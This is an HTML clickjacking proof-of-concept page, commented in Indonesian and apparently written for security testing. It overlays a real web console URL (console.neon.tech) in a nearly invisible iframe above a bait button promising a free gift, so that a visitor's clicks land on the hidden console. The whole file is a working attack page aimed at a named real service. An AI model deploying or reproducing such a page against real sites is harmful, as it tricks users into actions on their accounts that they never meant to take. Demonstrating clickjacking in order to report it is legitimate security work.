<!DOCTYPE html>
<html>
<head>
    <title>Clickjacking PoC</title>
    <style>
        iframe {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            opacity: 0.1; /* Membuat iframe hampir transparan */
            z-index: 2;
        }
        .bait {
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            z-index: 1;
            font-size: 20px;
            background: red;
            color: white;
            padding: 10px;
            border-radius: 5px;
        }
    </style>
</head>
<body>
    <h1>Clickjacking PoC</h1>
    <div class="bait">Klik tombol ini untuk hadiah gratis!</div>
    <iframe src="https://console.neon.tech/9737752"></iframe>
</body>
</html>
